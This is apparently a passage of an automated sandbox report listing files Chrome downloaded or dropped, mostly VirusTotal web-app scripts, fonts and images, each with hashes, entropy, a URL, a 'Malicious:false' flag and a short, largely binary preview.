                                                                                                                                                                                                                    SHA-512:4E5E198DBEF905D71FAA99FB8F08741B8FB4F79851ADF9974B60FC20011C5A10015DED615E60D6051FFED1BEA7C5ED5FED7668EAB8B25EE52AAA006F7C3D9578
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/19739.d25d76e348ff4042df61.js
                                                                                                                                                                                                                    Preview:...........\..6..~OA+...%9.4.F.e'.8u.Jv.....6..J.)RER#Od=.}...'._..AR.qrWuV....F....dp..U.e...bY...z.F.^o..........0.W..>}z.....j;|.n..O........t..zyb..|tg/...Wl8..-..S.W.6...._......_.f.......}|..+.c..w:..m'Z.A{<.C3....xj...V...u..nU.^.|.{'Y%.<.."..9.}".*p.....u.e,..[p.~1yU..!.V.U..^.m.+.jo...........t_..&...4....:@..=+..'.d....@..y1..2....$.n...Y.uK0.1....;Z./W.2u]{X..w.{...a...,.an....<:.....O.r{Y..P.......Y.,Is.f).9.y.L.`X...).l.......~`.~....<...ix.:...WQ.V..>.,.++..."..."..}......<...So...*\g,^=...H?O..i..bIW.|h..va.}....K..b....C.a...-.:.D.-&....Q..Z,/.^o.4b....YY...y.......Vt#..O...=8..y.)...<E.T...!c.d!.e...!...~...F.?.3..%....V..s.....=.4g18-"_...2E....~..Y..a.V.....V.,...JR...ss.5...Oh.j.6.2W\@.m&Z.>........!..(...p....-2......1pi.l_.5.O.#.#Dmq.k.*.0..,L.......<TuQ..........f.f8..L.jV...2...%K.d.......m~.*,..EX.|...m.c...8B..,.u.nPl..zo<,G..7|....r>.j.J.,?.GZ.C.......6T...b...an...l.>..k.....0..1w...V.Y...C]C...,.>...z........
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):9534
                                                                                                                                                                                                                    Entropy (8bit):5.627021129412035
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:oLIlXOZfKGg+2GBdCjZ5bqGIwD6YKQqVcd6C:LlTqMr
                                                                                                                                                                                                                    MD5:8C119674457A64D6C0D2E8E7FCD0E594
                                                                                                                                                                                                                    SHA1:58D8138EF7CF7F5332CB698A05979C59F7486892
                                                                                                                                                                                                                    SHA-256:497FAABF80F6BD2B350BDB228346B454799DC28C364368EFB74D12726BD176DE
                                                                                                                                                                                                                    SHA-512:48EF152FE017DC788788F1ADE5B030C6733552FE0F83D30362C20587FA0719C3A8A17C19E75C8E14F0E32988F2DD99AE87133FC922E24D0F0BC507F0290322E9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://fonts.googleapis.com/css?family=Google+Sans
                                                                                                                                                                                                                    Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v59/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJl1pynSEg.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v59/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJl3pynSEg.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v59/4U
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 18722
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):6552
                                                                                                                                                                                                                    Entropy (8bit):7.972245051047832
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:n+V0Mo7YM+FYzOjImghYOD71wrWddaZPM5EJI:+yMo7j+qz7tCOX1wrqaZgEa
                                                                                                                                                                                                                    MD5:DDEDB7BBB2A77F7834DBBC0CD43B6090
                                                                                                                                                                                                                    SHA1:BA7402C3F50BB9B5B2900A55EBDDC742E5223220
                                                                                                                                                                                                                    SHA-256:6FEB27DE08D529ED762048DDA53C44A567487B833B4B5F6DBA8E75F40BE93F0A
                                                                                                                                                                                                                    SHA-512:9594FD5CD60EE3C971B94E3D8A6C102BB6407B96157866A15FF1B1DE37EC2B91A51BF0031FFE378F3048BC98DA4242BB96CAAE92DD19E4AB9B7AA9DEDB0FA68F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/94571.68f95a2c314991f05e3e.js
                                                                                                                                                                                                                    Preview:...........\}w.F.......z.G...088u.......9m.......D%.......1..ow..4...;/w...3.=...Y...a-......\.L...Mq5...~........e...I...~..t..._+..D......t..Z.v.Ww2<.7...u'..Z..<.;Q..>...u'............u'..A...;..jw..-.v.i..1lH}..=4.x..{..3..^...&xl.;x.Sk...S<..:-<....x...f.=G...P.k5.ZXk..^...x....A.U?.Ea];..w.s.\8/.3.s.;..G...y.|r.9...............D._..y..Q.H.9i...T~6.OER.^,.q1...'{OE?...`0H....."(..(..&.t&.....,..iV#....hT.S.j....L.#.L.b...5..0/.A....'..l*.=.1.k..hC..P..C.h.8.].^........SK.5.EVK......../.....I.0..<K,.wv.....P..D.].qN.dF.s..~.[..I.[#o.."H.H.< R.....y.WR....(..I4.....tv...q...0..>A....a&.D.ZA........6E...(;..Y..}.S..l/../...........Z..y..#qr~^.}.Mx..3.~s......,.S.Z!.E.....k...&2...z../H..y!N%.......vd;$R...51..r".@?Lv.F...X@....C...Bc...";I.4)@..Dyl.D...B.O.$..q]n..ydA@..ja..,W~.{5...aM....d....+.0.M....8.@. .'.D..S...L.I.........,....X..b.6Jr.I..;HcWm.h.....^....v=..w.Ec...wXH..."...b.....-p.%.....<rA."M,B......9...7..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 387
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):250
                                                                                                                                                                                                                    Entropy (8bit):7.11097433147508
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:XtYDF73ry6+nGtyhx8sugjqfCDtxLbeBG4mfD/DsUw7D2Bvaqu+sE:XODF7GLGtY6YDtxmJmz7s2BvG+N
                                                                                                                                                                                                                    MD5:4E1E87884980A10BF8D24DF237DA22F0
                                                                                                                                                                                                                    SHA1:CDCE35FE2150599B6EECAA47FB9E6570FBA4F681
                                                                                                                                                                                                                    SHA-256:C065292E6146725367A05671F418A52FCC8D62045A2C9B8DF200618B3717B5D1
                                                                                                                                                                                                                    SHA-512:EB192F5ACFC194550DAF68035C05436123FE7567BA8559E1A3B65A79833C6AC12A8F73053C2E00E8799F04BF25F58F8FBD860898B3377F2BEEBB613F77F41BFA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/static/opensearch.xml
                                                                                                                                                                                                                    Preview:............;O.0..g.)..W...(..r....`.H.C..Z...-....lY..CV/...M.......(.0F.c...)..(..T..*.k;...S...?...|.....c%n...P.}..'6..$6?..={$..xU.J..3..qfp.F).C.....j.i....Zz.x.n...#.@.....`.........e..[._..w.(.?I+L.f....8(X3t...W.........s.......
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 40839
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):10902
                                                                                                                                                                                                                    Entropy (8bit):7.980315063833421
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Xy5WBKqjvdmHexvgvAUN96hjJMuUWWsuB/tvMElWwBI7nhYtkz8hj8a4Q:XysBVvE+xE/ehjJkWWsmVNBiQksgc
                                                                                                                                                                                                                    MD5:2E472C7C975E22AE106620EBC5073786
                                                                                                                                                                                                                    SHA1:7B342E6C95D8A045F19762D1C13EDB8044F0482C
                                                                                                                                                                                                                    SHA-256:FB3BCBA2F411E5B4A0074D0E137AB15E33E3798F50C8F8772E829B50602B3B48
                                                                                                                                                                                                                    SHA-512:9D9D2313DFD5FBB3BB8BBC62F2E50A7E42BB9E7D0D0EEAD81F44E037A97CDE9727F3496F6E56804765092DAB4C5576065ACB3188B7E8FBA0E1C7EAF8C2BD50E2
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/9234.4895d7a797c4dbf3a58b.js
                                                                                                                                                                                                                    Preview:...........}kw.F.....0..Kf...Q.).#;3>k..X.{...dSDL.|.P.......n.....y...E.M........l.S.Y.N..I3U.....`..t...\d....e.F...~..........;..n........MZ.g...9...N...GI..<...>..{....c.;..[n0jR....4.....V.....A?..t..P..n.A..:Y...cw.Fj.L.`..l.M.0.d2n...$R..$...._..<.c..i.y6...h4...w...$..U..2.{..T.].T.$.WY.4i}..$.5.17m.F..J.3.-.....N.?U.8.2..F.y^...D-.K3.F..FJO..D.F...Z.t.>F.Z..7.=ZE..Z...}..]...Z.._..I..u.9...8x.X.r.fa..*u?7.2j.."HSG]e*..N...W.E..L..d...JZ.t.45}..1.r.y...p.^.n..G.)..*..EQ.......k@}..F. ;.'.b.....X.....0........|~C.RM........0....N.d..L..JSTL..G&..n..S.8 ....J...y....:J..:=;k5#...m...c.6.l.h5'_.6'....ix......8As/.W.*N..8........r0..K...R.9f5...+...O.:X..G........|.io+.f.w.hPV..N2..9O.`..E.C/...8..B.....u.JG......h...T.={...7.j..Zp..s..:4.t.gN.,....B5....,s....-.....l._......=b*6.....a....b...vw.F.#.MA...`.5.<.9.`L.?.O........n^......W..2H.0:..r5..0..........U.k..........ftV......t#}....rz.....*._s...._.<.'ik..v..<..(F..|.Q.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 60953
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):16488
                                                                                                                                                                                                                    Entropy (8bit):7.988183188128358
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:VPUrhyTpXMEsndBy6ui+gl+7EsnYCE4ogg+MMjTE9MOO:Vcrh8N4GNIlqGgg+VjTiMOO
                                                                                                                                                                                                                    MD5:F353ABA8196DF13EA69CDDC295596E73
                                                                                                                                                                                                                    SHA1:1581D16DBD9617DCBBAFCF09EC56DF421F2F8A17
                                                                                                                                                                                                                    SHA-256:5010300AED90323DED5E9B1B4D5D5133B068E3884BC624C9AAFEB6C14A4443C8
                                                                                                                                                                                                                    SHA-512:4BC2EA6E639EC9C006DA47DF079C1E364597B7A851EC09A78FE0E73D891915C32B11B646ECF30464558796117C12B25C4E0FA0D08033CFBA3765F23D80DBD9D9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/34386.8514664b2d3faf72fdd8.js
                                                                                                                                                                                                                    Preview:...........}k{.7......N.!}.-.y.L+..3.Y_....'.m.$.R....Kh..}..@....x2gg.G.L......BU.PJ......p...r5.t.........G...g.e..J.Kgg.F...Z.F..u..v..[w:.n.W...[.....*..$]...=.....,u.A.U...l7Q......7...?.A.[-{!.m5...7..z..l..'Q.L..7.G.g..]...0..3i....X....b5.fi.O..Ez......7[M&.~.~4.....S."J.].~Z...2.}.%.e.H.....7?..%w.E.~?.]D..>.OP..cWwa+..E..2L....$...h.L...u<.G....a.._=.+.r).Gg.y...._.Q$.Y..?.....Q...<+...t..9...x.....(..H.R..f.F.E.4..'a.8.M..F.......$"$.."'...e......p>KR'.+...~z.'.E.?O.(I.&zt5.GN.(..;A>.F...+r$.{...NV..KJ3...'/.~..........|..?....f.f....W../...Y....w.y._./...W....o.Q.../...x..._\n.......w.}../..KP..,.=..=..n....2....Od..f5...B.@.5!.w!...<..rM...D+pw5...}........Y......W..1.....C..R..xy...T.?.R.cB.PN.....^..z....=Y%.x..W..o......e...x.^...5.f..[.bVU1.(...x~./......%.6.(4.....Q.E....~.\.......X.4$Fm5S....?Y....?4t...{P.VeA1...d.|....z..z..|t[I.......=.z....C.3..T.u....+e....%%l...r.+../Y(Kf.Eb...}"=.w.......8.U+...`..2.`...%L.D,..{.BL
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 12258
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):4587
                                                                                                                                                                                                                    Entropy (8bit):7.955608214697613
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:hCTrMKYIHsTwbrc8i5X33BVWHzQXFTwOXmr9Zoo8u7aa4yPD5YZRA6:ZcsTarXi1WHsXFTwOY9ZQuhiZ
                                                                                                                                                                                                                    MD5:933513FD01D83597CB4F584178867045
                                                                                                                                                                                                                    SHA1:AA59EB8D395753BD3260F660AE46F6BE690679A7
                                                                                                                                                                                                                    SHA-256:15610820ACC264C88A4C4D89DF208B6C568A6DC1AFF94C472C178D86D61EC314
                                                                                                                                                                                                                    SHA-512:0EAF30649284AA3D289771145E92FEEF7230021ECA14D12828EC7EB5E6DCA8D0D1BC5C191A35DDCDCEAF3109C24419183554EA1306E20A225CCD220EF63F96D4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/65941.e44934c037380e9ec129.js
                                                                                                                                                                                                                    Preview:...........ZY..6.~._A3...\..}.....N...q...!]].DB.....H.5j....p.f;s..\?.),...g......9...X.&3oC.+.>.^...:.\..$N./.=?.?......~....N{....v...;.V{4t..n...:.^........t.]g<hu..i.......F.E....f.[.a{dO..<..a.4..N&>[.n.vR|b.e;...q{...Xb.7.....m;..;.;...S,......w{.S..m.@w.....+|....>....F..........._c0..%>;.....=.......8..'........-..."..8K..n..V3l..y..i....|../.....I.........4.9.?l.Y..,..<d.*.%...I<..L.5. .h63>.Y..WWf..I...0c$.6....wB.......I@5.n{Bn....me..'.....K."...7..<:.!?l.....F........eDgqJ.].y..K....pn....7..S..M.....R.x....;^@L..y..m'_..{.!...........}..1../..."...).(.....]..Y..=Y...%.nA.2.....c.&.......<.6.'gI.8.....G...%..7.............K........Z.j#4..oA..h.;.8..nF.`._....q......=I...L.U..<^S.O<.X.K._m..^f1[...{6..o.Sp....XN#.<..w......~..9.#4`[p.[.$TG)..r.............gP;..._.UX.\.......4...r..E...I#2M.!570..b.y..>.a42.4S:....Z{..x..e.$..s!..,I-.|.hl.v.%FF..m.i.D...C.......;..,......./..$.../........,.V.....i...iD$'n.eI....F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 96769
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):34001
                                                                                                                                                                                                                    Entropy (8bit):7.991717447206512
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:Tkz1MTPRiz1fPzpKEJk5OAbzURd5C6zuSBWQsSoku:iM7cRP18OAHUY6CSoSoku
                                                                                                                                                                                                                    MD5:AB39851A807CB9823A23EA404BAD6CBA
                                                                                                                                                                                                                    SHA1:C5AFFC8081784F1C02AF34B8F3A25ACEC838632A
                                                                                                                                                                                                                    SHA-256:179ABF9C9C102B4AD28CC425D687D970B346146B0B80FFF4720B021C09DE4946
                                                                                                                                                                                                                    SHA-512:1E336BC1653047288A908D9CF2AA64254BD1F2CE05AF880C25714463F620D0F945F894FC5421C4806AC7386A8B7D4A56DA8F76339A928A0AE2538748B3C9C6B9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/2766.83fc8c19511961389f7a.js
                                                                                                                                                                                                                    Preview:............z.F..y+2...!..>,S.x.'.8.;..N.(..EA.b.`@."..{..{...K.+._U..!Q..3s.=.Nf,.Q]]]U]U]...YY...%...yr8...=;.g......l.f.G.}.....L....^....~t%?.f.eQ.w....L.l..g..").E...'.8.?|0........+.A....o....._.6..o#.)..l...l7.o..7...$)..0.}.#...4..'.$+g.I......G.....R.A\.....}In..(...k....U....-...7..u.|,k...h...q...?N....no;i.{.>.v..4..A.g...$..m..].i.}o..."J../F....:zb....5.`..q.....r0.^I......r0.. -)...f....m..........c.....+....n...D............!...uT.'.e...t....\Wsn....{.t....W.d.&...Q...s..<.\.F..F.=.../6~.7.O.u.j..<...8:...I.v~..+...3...~y..W_...S.~.}1}......W....zu...S....o...i..^..E.}..^>.Eo...,J.....y...^>...[.|.G..'z..[..Fq.,Z.$.u.<.1W2...o.....3...$..]^.Z.3[.....xR.S3o.y.7..Qr.f.Q.A\^N..x....a>y...3W..Y7*.b......t..}a(...'O.bt.Ig..........pi...l...N.0..e.ri.0*.I.../..L...`.._i..x4...l....V$3.a..h..+;..b>..G...........b4.:.>4^%.^:.h.v\.g|L.?u,.VY.{s8x.~x..J..>.6?..[\>....Qk..<\..l&..^.0.....F6?;L..vh..uE..e..2zE....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):6081
                                                                                                                                                                                                                    Entropy (8bit):4.199726045993515
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:Vswt+VqAFyHa/POzYqjv05QyNXGMxH+00R9QaEe6KnVw4B:SwA4AFyHa/PWzs2yNXxH+00R3bVwK
                                                                                                                                                                                                                    MD5:58C023913A21D8D59A877A81B1B6957D
                                                                                                                                                                                                                    SHA1:97F8E07E9163161C0AB2836BDE5D11FCA80F5F6D
                                                                                                                                                                                                                    SHA-256:DC39E241F967FF3897379644C8FD335B3D52C18E31C6B4478D4F5FEBC74A533A
                                                                                                                                                                                                                    SHA-512:152F36D600012B561980CDD91ECC46BD1F65EAC42F8166A30CDF205FB8A4D9AFF9D0B95F444F0B8F942252857DB203A7703183E62D5D9C4DF6A30F80C30C5011
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:<svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M88.344 32.4292C81.8485 37.2328 72.4336 39.7956 64.3276 39.7956C52.9617 39.7956 42.7294 35.5779 34.9883 28.5629C34.3801 28.0113 34.9251 27.2595 35.6549 27.6891C44.0091 32.5659 54.3386 35.4998 65.0088 35.4998C72.205 35.4998 80.1212 34.006 87.4001 30.9061C88.4997 30.4375 89.4193 31.6286 88.344 32.4292Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M91.0443 29.3295C90.2172 28.2653 85.556 28.8267 83.4638 29.0757C82.8264 29.1538 82.7291 28.5973 83.3032 28.197C87.0157 25.5755 93.1073 26.3322 93.8177 27.2109C94.5281 28.0945 93.6328 34.221 90.1442 37.1451C89.609 37.5942 89.0981 37.355 89.3365 36.7594C90.1199 34.797 91.8763 30.3986 91.0443 29.3295Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M83.6098 9.6906V7.14237C83.6098 6.75671 83.9017 6.49799 84.252 6.49799H95.6228C95.9877 6.49799 96.2797 6.7616 96.2797 7.1
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):26606
                                                                                                                                                                                                                    Entropy (8bit):7.976686332513471
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:fL4HJ3V3TR9xpjn6dJGoKCSEBNrTfTnsstWPR4WFbdRm1CcFlX4sJA86RywLZq/:TYb5pj6dkoKmLnsst/WFbdqfD4sJVWtQ
                                                                                                                                                                                                                    MD5:2D308B90075EACC8E1DAF15744DE3A1F
                                                                                                                                                                                                                    SHA1:3203418C8BFF4A36B07FDC2822CE1CF75AA09B13
                                                                                                                                                                                                                    SHA-256:D87EB6F6F79D00B44BF7F71FD41513A0877ECBA46D3D651FFC6C67C80ABE9891
                                                                                                                                                                                                                    SHA-512:A483CFBF8870F850CFF5E2810E7B49B1A89A1992D6D8FF609A65C71610F3D46D55327F41E60EB4C710FCCE152A88C01D442AB0F2765C4DD04B525BE812755F24
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.g..WEBPVP8X..............ALPH.......m.0..g;}....@....q6'p.IR$...0R..........8.+..#a$......0.......DD.aH.|..>z.x_...sk.....7}...I...,D..y..C...7.B..E\.{:Qcl...P..@...@cm.0....m......~....6_...?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?........r....F.m...r.m..........@.l.........E.W.Vq=....2..,w...*.Fci..\'.V...d......pN..S.CVP8 .d......*....>.H.L..&...(....in.*...B:.......g..U.;}z8.......O.....o7...C.....r.<{......._......{.............^...w....%..._.?.......?...?.}........._.............d...+.../..f...3./..?....G.W./.o._.?........
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):63
                                                                                                                                                                                                                    Entropy (8bit):4.051513057905438
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:SERQwF0NEH01qprchUpHliAn:3RTuNEU1qp4hUriAn
                                                                                                                                                                                                                    MD5:87101386CC8CF9754CFADD08190D2DEC
                                                                                                                                                                                                                    SHA1:A76BAF8F042045F2C72B15743F6679977DF43F47
                                                                                                                                                                                                                    SHA-256:3311059E77C222EA6F69AC58FAA332E626F67AD867BE9B6158D0E43E35609C98
                                                                                                                                                                                                                    SHA-512:33B8FF172528140E16E65CFA063DA62049F740CA45CF29ECCA5499FD7989D3F9D4885212191B56B04CD6A094B6ECCC74921C7817E5E32E6033AB3E445F00F101
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/submission/challenge
                                                                                                                                                                                                                    Preview:{. "data": {. "challenge": "6CLNK6y59goFFC0S". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 36664
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):10992
                                                                                                                                                                                                                    Entropy (8bit):7.981005453442858
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:2/t8oz9m824n+3sGyJdpCoJnTZNwvWaGSiBerfYKAqZInoGDsX2Ly7NJTwzS+rA6:2/qoI8+eJdJJ1NkGSpFkrcxJ1+/
                                                                                                                                                                                                                    MD5:D059388C7FCBCE9103A1484401AC5308
                                                                                                                                                                                                                    SHA1:CDDF4A5D1B7CC78F6B7FD6C57725CF7F6F066542
                                                                                                                                                                                                                    SHA-256:EAED55BAC41DCD716AD456CE9EBA83A862689307AD9F506F5D09411F017AE943
                                                                                                                                                                                                                    SHA-512:59A31D2299E7822A144AFFC7276B529633B70E542EDB0C5D110A16458FFFDE3D21BC7354D4FFADDAED44257DDBB27B4B94D818403B6202C6984B8E1BCD630FEC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/58912.318758154ac26af8c8bf.js
                                                                                                                                                                                                                    Preview:...........}ys.H....)`..Mt.....hZ...Y..GX...*d..I.A...:L._fU..R..=~..m.H.......h.....4.......F.o..x..?].W..j...+y_.\\Z.b..j....~.e7....j....[...N..U....^..[.hm....H...I...}....i.Xv<.,.q.&.h.N....^:].8.(............Q4....t.n.G0.i......"H.A6N.E...%..t.Njf.E..0.[.....L".}..T l.9~0NR/.,o(..I... ..'........../..A\.[.p._..g5oX.Q.5.r.....m|.......i./..@..g.gr.~0..@.R... .r#..j.p.yYf..y....9.a~....U.{y86....G.[.q.g...C.....g...W..".$.=I,..@.M...-G .Z.r.^>.........j..j..i.S.0.b....$....V./.^.....p4;....1%.~X.z...9.$a\C....a.....I.f.o.......2....v.8A...o...q....@..,.k.3.c....f......*...3.yi>.A....o.1}?.>..e.C44.......O....,..3.)...4..e..S...^..b=.X.K..S..3.I.. ...z..~0.....g.....GYN~c.......X.........`Y._....F.......h.6..X.-I..UA..=.z...U.5....'.^.6..qrz..8......K=.....G.....zzt....v.S........W.F5_..U.....^*..-Wn...j...>...........8y) |.h4_.k.\.K1..G.'..'....lv..X.O..V......0..ik...&......?u..x......rG.QO<...,..1*....h.7/50$.W...1.4..>w...#
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 56800, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):56800
                                                                                                                                                                                                                    Entropy (8bit):7.99138106422861
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:1536:l2VJ5heJu0NUznVjSmrQgU+vRkUOoR7Qe:kVJ5hetUzVj5vRkUOoFQe
                                                                                                                                                                                                                    MD5:C3134A2479EABCC47058FF04ED1A8FD4
                                                                                                                                                                                                                    SHA1:10BAA5250E802D00F08D92FE937A6D795F08F899
                                                                                                                                                                                                                    SHA-256:55F651F5FE8B3F8748994899A0245FC404ED43705E9C45AEB47F8FC8C36B189F
                                                                                                                                                                                                                    SHA-512:DB15FEADE6F50DFCFFB59D252DD4E7786DF8E561F4C1B2A6E3C933FE8D0566FD24C7B8946E7520FE18AB481657C78AB85034DF6D447454EB605BD2817A8F033F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/fonts/gordita/gordita-regular.woff
                                                                                                                                                                                                                    Preview:wOFF...............8........................FFTM...l........|..GDEF.......>...B...aGPOS......IG........GSUB..K....B.......OS/2..NT...S...`i..\cmap..N..........+G7gasp..R.............glyf..R...s....D.5WQhead......6...6..TNhhea.......!...$....hmtx.......).......8loca...@...U....;..Fmaxp.......... ...Wname......F...7..B.post................webf.............X..........Q.j.....!........."x.c`d``..b+ fb`g`d...:.. .............na...;.....u0.....g..x...x\...^.n.."y...o.,6....1.BB.0..$..K.oB .......a.1.....e..o......nuK..%u.z.$.%...~U}%....|....nU.s...N...&..,~!..............._O<*...sV..H...y.4..#.E.e.|{....{.........=~.w.w...S.....T...\.t..E..{...?.......2/...../.^....~?.........O.........f..;..O..p@...N..r...=.......a.m.....|.!.C..]3t..ai......v....2...C.8.3%=..?.nJ..t............j...Y....}........y?K.F.5.g...5....CV.xr.{...bf9.z.80.tD..q.......J........O......K.#.#_G..|6.n)#.'.+..L.a.#....5j......9.2E.........U*......'.1......:%}...i.6...Gl)
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):15576
                                                                                                                                                                                                                    Entropy (8bit):4.971780855193176
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:/Xhzkix9pSL9LuD5sx9Je3FY1x9C8zQGb+BGIx9ha1wZrx99aORJ+Ux97vHQfjVw:vNSBAN2dj1CAQlPajmKxckn8PoEMs
                                                                                                                                                                                                                    MD5:ADF91D0DF3C70EBFA4D3C5EFA1902EE2
                                                                                                                                                                                                                    SHA1:2EE72855BF9418ADDD6093AA08F5AEFA52C267A1
                                                                                                                                                                                                                    SHA-256:E6FB656BA40A47E51EB18B15ACFBB935838527B924137755A030A5DE65E9A7FB
                                                                                                                                                                                                                    SHA-512:0355CBAE6B7F8EA31342397111108189641B9AB264912DDE569A54A76D0872BBA5E599CBE4EFBC69CAA5BE96C2144A7A439BB4E3F5519BFC12CB6A76A45F1843
                                                                                                                                                                                                                    Malicious:false
